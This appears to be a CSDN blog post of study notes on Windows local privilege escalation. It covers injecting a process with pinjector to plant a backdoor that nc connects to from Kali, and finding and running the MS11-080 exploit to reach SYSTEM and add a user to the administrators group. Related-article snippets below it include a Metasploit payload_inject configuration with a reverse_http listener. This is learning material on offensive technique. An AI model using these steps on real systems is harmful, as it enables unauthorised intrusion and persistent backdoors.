关于本地提权的学习笔记(二):注入进程和利用漏洞提权

最新推荐文章于 2024-05-14 20:41:57 发布
最新推荐文章于 2024-05-14 20:41:57 发布
阅读量3.6k 收藏 2
点赞数
分类专栏: 提权 漏洞 文章标签: Kali 提权 信息安全 漏洞 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SKI_12/article/details/57400687
版权

本文为学习笔记,很多不足之处望各位指导一下~

注入进程提权:

该方式在实现提权的同时给系统安放了后门,以便于进行隐蔽的监听。
下载pinjector.exe程序:

https://www.tarasco.org/security/Process_Injector/
然后将该程序放入system32目录中,在命令行中输入pinjector,提示有-l和-p两个参数,先输入pinjector -l 列出当前执行的进程及其相应的用户名。找到其中一个包含System用户的进程进行注入即可:


输入的端口号实现监听,可在Kali中用nc进行监听,并且可得到System用户的权限:




利用漏洞提权:

前面的提权都是在管理员权限下进行的,如果是普通用户则可以通过可能存在的漏洞进行提权。下面以两个漏洞举例。
MS11-080:
Kb2592799——关于漏洞的描述等的信息
https://technet.microsoft.com/library/security/ms11-080
在Kali中查找相应的模块,需要添加-v参数才查找得到: 
searchsploit -v ms11-080




在实验系统中,在运行中输入 
appwiz.cpl

来查看是否打上了相应的补丁
在a用户的命令行上执行Python脚本转换而来的exe执行文件(看补充知识点),其中需要输入相应的参数:


输入whoami查看权限,可见注入成功,已提权到SYSTEM:


进一步利用,将a用户添加进管理员组,此后的登陆之后都是管理员权限:






MS14-068:
设置域服务器:
以win server 2k3作为域控制器:
最低0.47元/天 解锁文章
Mi1k7ea
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
查找域管理员进程
谢公子的博客
02-27 2127
目录 查询域控制器的域用户会话 交叉引用域管理员列表与活动会话列表 查询运程系统中运行的任务 扫描远程系统的NetBIOS信息 首先得知道哪些账号是域管理员账号 net group "domain admins" /domain 如果运气好,执行以下查看进程命令,或许能查看到管理员进程。但是结果往往不尽如人意。 tasklist /v 查询域控制器的域用户会话 net g...
kali】27 提权——本地提权
(∪.∪ )...zzz的博客
10-22 829
这里写自定义目录标题一、Windows系统提权1. 使用at提权修改密码查看系统用户查看用户状态查看用户进程将user权限提升为system关闭explorer创建explorer2. 使用 sc 提权 (适用于 Win7 及Windows server 2008 等高级版本)3. 使用工具提权- Sysinternals Suite 套件 windows: user administrator system ——内核 Linux: user root 一、Windows系统提权 1. 使用at提
网络安全最全VMware Tools本地提权漏洞CVE-2024-31676分析与复现(2),2024年最新10天用Flutter撸了个高仿携程App
最新发布
2401_84264692的博客
05-14 555
VMware Tools没有正确的检查客户端请求的授权,导致包含一个本地权限提升漏洞,可以使虚拟机中的计算机账号由非管理员权限提升到管理员权限。
Kali Linux渗透测试 044 本地提权
kevinhanser
02-28 2120
>本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 >1. Windows 系统提权 >2. 注入进程提权
MSF 下域内渗透
A_991128a的博客
03-15 262
先获取域内机器sessionrun get_local_subnets //获取本地网络子网掩码route add 192.168.233.0 255.255.255.0 1 //添加路由表run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由run autoroute -s 192.168.2.0/24 //添加动态路由route print //打印路由表。
msf注入payload
whojoe的博客
11-19 478
msf注入payloadbash参考文章 bash use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.3.1 set lport 12121 set session 1 参考文章 https://www.cnblogs.com/hcrk/p/14419762.html ...
OpenRASP学习笔记 .pdf
09-05
OpenRASP适用于各种Java Web应用,如电商平台、金融系统、企业内部应用等,能够有效防止SQL注入、XSS跨站脚本、文件上传漏洞等常见攻击,同时还可以自定义规则,适应特定业务场景下的安全需求。 总结来说,...
kali学习笔记1.pdf
07-19
windows下的扫描软件NEXPOSE),windows和linux缓冲区溢出原理以及实践(包括编写shellcode的方法),提权方法(详细讲解windows身份认证过程,本地提权注入进程提取,利用漏洞提权利用配置不当提权,wce攻击,著名...
oscp-priv-esc:适用于Linux和Windows的Priv Esc指南
02-24
2. **利用内核漏洞**:发现和利用内核级别的安全漏洞,如本地拒绝服务(DoS)或提权漏洞,以获取root权限。 3. **文件系统漏洞**:查找具有不正确权限的敏感文件,如系统配置文件、SSH密钥等,攻击者可能篡改这些...
学习中的一些护网笔记。。。。。。
02-07
学习中的一些护网笔记中,我们可以看到很多重要的护网知识点,本文将对这些知识点进行详细解释和总结。 1. 端口范围 端口范围是计算机网络中一个非常重要的概念,范围从 0 到 65535,共 65536 个端口号。其中,0...
安卓逆向学习笔记(0)
01-11
本篇内容将围绕"安卓逆向学习笔记(0)"这一主题展开,主要涵盖以下几个方面: 1. **基础知识**:在开始安卓逆向之前,我们需要了解Android应用的基本结构,如APK文件的组成(包含AndroidManifest.xml、Dex文件、资源...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 5061
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
权限提升-windows内核溢出漏洞提权
weixin_39430198的博客
03-14 1671
一、课时目标 1、理解权限提升的原理和目的 2、掌握常规提权的思路和方法 、权限提升 2.1 什么是提权 提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。 2.2 为什么要提权 用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更
CVE-2016-0095提权漏洞学习笔记
HBohan的博客
03-28 848
一.前言 1.漏洞信息 该漏洞是在win32k中的bGetRealizedBrush产生的,是一个内核空指针解引用的漏洞利用漏洞可以完成提权操作。由于有公开的POC,所以对这个漏洞的分析和利用就变得简单,POC代码如下: /** * Author: bee13oy of CloverSec Labs * BSoD on Windows 7 SP1 x86 / Windows 10 x86 * EoP to SYSTEM on Windows 7 SP1 x86 **/ #include &lt
权限提升-Redis&Postgre&令牌窃取&进程注入
xhscxj的博客
03-03 360
一、Redis 数据库权限提升 Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空; 如果 Redis 以 root 身份运行,黑客可往服务器上写入 SSH 公钥文件,直接登录服务器。 连接(未授权或有密码)-利用如下方法提权 参考:https://blog.csdn.net/fly_hps/article/details/80937837 (1).利用计划任务执行命令反弹 shell (2).写 ssh-keygen 公钥然后使用私钥登陆 (3)...
Windows权限提升—令牌窃取、UAC提权进程注入提权
剁椒鱼头没剁椒的博客
03-27 3844
在之前的文章中已经对Windows的权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。Windows权限提升—溢出提权Windows权限提升—MySQL数据库提权
Windows Credentials Editor v1.2 (WCE)在***过程中的关键作用
weixin_34372728的博客
08-28 287
昨天G0t3n聊天,G0t3n说起Windows Credentials Editor v1.2 (WCE)这款软件,除了抓HASH,还能注入HASH***,提升为域管理员权限。 参数如下: -l List logon sessions and NTLM credentials (default). -s...
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
常见windwos提权笔记
03-30
本篇笔记提供了关于Windows提权的基本概念、用户权限分类以及如何在特定情况下操作和提升权限的方法。这对于从事网络安全、系统管理或漏洞修复的专业人员来说,是理解和应对安全威胁的重要参考。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值